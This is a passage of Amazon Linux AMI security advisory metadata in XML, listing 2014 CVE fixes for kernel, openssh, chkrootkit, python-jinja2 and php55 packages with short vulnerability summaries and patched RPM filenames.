arch="x86_64"><filename>Packages/php54-mssql-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.30" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.30-1.56.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.30-1.56.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.30" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.30-1.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-368</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-368: medium priority package update for kernel</title><issued date="2014-07-09 16:29:00" /><updated date="2014-09-19 10:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4608:
1113899:
CVE-2014-4608 kernel: lzo1x_decompress_safe() integer overflow
** DISPUTED ** Multiple integer overflows in the lzo1x_decompress_safe function in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in the Linux kernel before 3.15.2 allow context-dependent attackers to cause a denial of service (memory corruption) via a crafted Literal Run. NOTE: the author of the LZO algorithms says "the Linux kernel is *not* affected; media hype."
CVE-2014-4508:
arch/x86/kernel/entry_32.S in the Linux kernel through 3.15.1 on 32-bit x86 platforms, when syscall auditing is enabled and the sep CPU feature flag is set, allows local users to cause a denial of service (OOPS and system crash) via an invalid syscall number, as demonstrated by number 1000.
1111590:
CVE-2014-4508 Kernel: x86_32: BUG in syscall auditing
CVE-2014-4014:
The capabilities implementation in the Linux kernel before 3.14.8 does not properly consider that namespaces are inapplicable to inodes, which allows local users to bypass intended chmod restrictions by first creating a user namespace, as demonstrated by setting the setgid bit on a file with group ownership of root.
1107966:
CVE-2014-4014 Kernel: possible privilege escalation in user namespace
CVE-2014-0206:
Array index error in the aio_read_events_ring function in fs/aio.c in the Linux kernel through 3.15.1 allows local users to obtain sensitive information from kernel memory via a large head value.
1094602:
CVE-2014-0206 kernel: aio: insufficient sanitization of head in aio_read_events_ring()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0206" title="" id="CVE-2014-0206" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4014" title="" id="CVE-2014-4014" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508" title="" id="CVE-2014-4508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4608" title="" id="CVE-2014-4608" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.10.48" release="55.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.10.48-55.140.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.48" release="55.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.10.48" release="55.140.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="kernel" version="3.10.48" release="55.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.10.48" release="55.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.10.48" release="55.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="perf" version="3.10.48" release="55.140.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.10.48" release="55.140.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.10.48-55.140.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.10.48" release="55.140.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.10.48-55.140.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-369</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-369: medium priority package update for openssh</title><issued date="2014-07-09 16:32:00" /><updated date="2014-09-19 10:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2653:
The verify_host_key function in sshconnect.c in the client in OpenSSH 6.6 and earlier allows remote servers to trigger the skipping of SSHFP DNS RR checking by presenting an unacceptable HostCertificate.
1081338:
CVE-2014-2653 openssh: failure to check DNS SSHFP records in certain scenarios
CVE-2014-2532:
sshd in OpenSSH before 6.6 does not properly support wildcards on AcceptEnv lines in sshd_config, which allows remote attackers to bypass intended environment restrictions by using a substring located before a wildcard character.
1077843:
CVE-2014-2532 openssh: AcceptEnv environment restriction bypass flaw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2532" title="" id="CVE-2014-2532" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2653" title="" id="CVE-2014-2653" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-ldap" version="6.2p2" release="8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.2p2-8.41.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.2p2-8.41.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="5.8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.8.41.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.2p2" release="8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.2p2-8.41.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.2p2-8.41.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.2p2-8.41.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.2p2" release="8.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.2p2-8.41.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="8.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.2p2-8.41.amzn1.i686.rpm</filename></package><package name="openssh" version="6.2p2" release="8.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.2p2-8.41.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="5.8.41.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.8.41.amzn1.i686.rpm</filename></package><package name="openssh-server" version="6.2p2" release="8.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.2p2-8.41.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="8.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.2p2-8.41.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.2p2" release="8.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.2p2-8.41.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="8.41.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.2p2-8.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-370</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-370: important priority package update for chkrootkit</title><issued date="2014-07-09 16:36:00" /><updated date="2014-09-19 10:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0476:
1104455:
CVE-2014-0476 chkrootkit: local privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0476" title="" id="CVE-2014-0476" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="chkrootkit" version="0.49" release="9.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/chkrootkit-0.49-9.8.amzn1.x86_64.rpm</filename></package><package name="chkrootkit-debuginfo" version="0.49" release="9.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/chkrootkit-debuginfo-0.49-9.8.amzn1.x86_64.rpm</filename></package><package name="chkrootkit-debuginfo" version="0.49" release="9.8.amzn1" epoch="0" arch="i686"><filename>Packages/chkrootkit-debuginfo-0.49-9.8.amzn1.i686.rpm</filename></package><package name="chkrootkit" version="0.49" release="9.8.amzn1" epoch="0" arch="i686"><filename>Packages/chkrootkit-0.49-9.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-371</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-371: medium priority package update for python-jinja2</title><issued date="2014-07-09 16:39:00" /><updated date="2014-09-19 10:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1402:
The default configuration for bccache.FileSystemBytecodeCache in Jinja2 before 2.7.2 does not properly create temporary files, which allows local users to gain privileges via a crafted .cache file with a name starting with __jinja2_ in /tmp.
1051421:
CVE-2014-1402 python-jinja2: FileSystemBytecodeCache insecure cache temporary file use
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1402" title="" id="CVE-2014-1402" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-jinja2" version="2.7.2" release="2.10.amzn1" epoch="0" arch="noarch"><filename>Packages/python-jinja2-2.7.2-2.10.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-372</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-372: medium priority package update for php55</title><issued date="2014-07-09 16:42:00" /><updated date="2014-09-19 10:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4049:
Heap-based buffer overflow in the php_parserr function in ext/standard/dns.c in PHP 5.6.0beta4 and earlier allows remote servers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted DNS TXT record, related to the dns_get_record function.
1108447:
CVE-2014-4049 php: heap-based buffer overflow in DNS TXT record parsing
CVE-2014-3981:
acinclude.m4, as used in the configure script in PHP 5.5.13 and earlier, allows local users to overwrite arbitrary files via a symlink attack on the /tmp/phpglibccheck file.
1104978:
CVE-2014-3981 php: insecure temporary file use in the configure script
CVE-2014-3515:
CVE-2014-3487:
1107544:
CVE-2014-3487 file: cdf_read_property_info insufficient boundary check
CVE-2014-3480:
1104858:
CVE-2014-3480 file: cdf_count_chain insufficient boundary check
CVE-2014-3479:
1104869:
CVE-2014-3479 file: cdf_check_stream_offset insufficient boundary check
CVE-2014-3478:
1104863:
CVE-2014-3478 file: mconvert incorrect handling of truncated pascal string size
CVE-2014-0207:
1091842:
CVE-2014-0207 file: cdf_read_short_sector insufficient boundary check
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207" title="" id="CVE-2014-0207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3478" title="" id="CVE-2014-3478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3479" title="" id="CVE-2014-3479" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3480" title="" id="CVE-2014-3480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3487" title="" id="CVE-2014-3487" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515" title="" id="CVE-2014-3515" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3981" title="" id="CVE-2014-3981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049" title="" id="CVE-2014-4049" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-gd" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.14" release="1.75.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.14-1.75.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.14" 